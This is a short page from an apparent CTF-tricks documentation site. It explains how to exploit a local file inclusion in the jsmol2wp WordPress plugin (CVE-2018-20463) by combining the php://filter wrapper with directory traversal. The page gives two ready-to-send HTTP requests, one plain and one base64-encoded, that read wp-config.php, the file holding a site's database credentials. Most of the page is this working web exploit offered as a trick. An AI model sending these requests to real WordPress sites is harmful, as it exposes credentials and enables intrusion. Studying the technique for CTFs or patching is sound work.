> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/lfi/php-filter-wrapper/trick-0292.md).

# LFI via Vulnerable Plugin PHP Filter

***

Leverage a Local File Inclusion (LFI) vulnerability by appending the `php://filter` wrapper to read the content of local files, often used to retrieve source code like configuration files.

Combine the filter with directory traversal if needed to reach the target file. For example, to read the `wp-config.php` file from a vulnerable plugin endpoint like `/wp-content/plugins/jsmol2wp/php/jsmol.php`:

```http
GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1
Host: www.smol.thm
```

To read the source code of files reliably, an attacker can use the `php://filter` wrapper with filters like `convert.base64-encode`. This filter base64 encodes the content of the file, which prevents issues with special characters or binary data that might mess up the output or be interpreted by the server.

An example using the `convert.base64-encode` filter to read `wp-config.php` is:

```http
GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/convert.base64-encode/resource=../../../../wp-config.php HTTP/1.1
Host: target.com
```

This technique is applicable to vulnerabilities such as the Local File Inclusion vulnerability found in the jsmol2wp 1.0.7 plugin for WordPress (CVE-2018-20463), which is vulnerable in the `jsmol.php` via the `query` parameter.
